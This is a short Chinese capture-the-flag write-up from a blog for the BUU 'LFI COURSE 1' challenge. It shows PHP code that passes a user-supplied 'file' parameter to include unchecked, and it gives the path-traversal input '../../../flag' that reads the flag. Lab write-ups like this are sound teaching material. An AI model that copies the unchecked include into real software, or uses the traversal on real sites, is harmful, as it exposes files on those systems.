BUU LFI COURSE 1
BUU LFI COURSE 1
hint 在标题了。
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
尝试 /?file=flag
,not found。
猜测在根目录,尝试 /?file=../../../flag
,得到 flag。
本文来自博客园,作者:Maplisky,转载请注明原文链接:https://www.cnblogs.com/lbh2021/p/18537084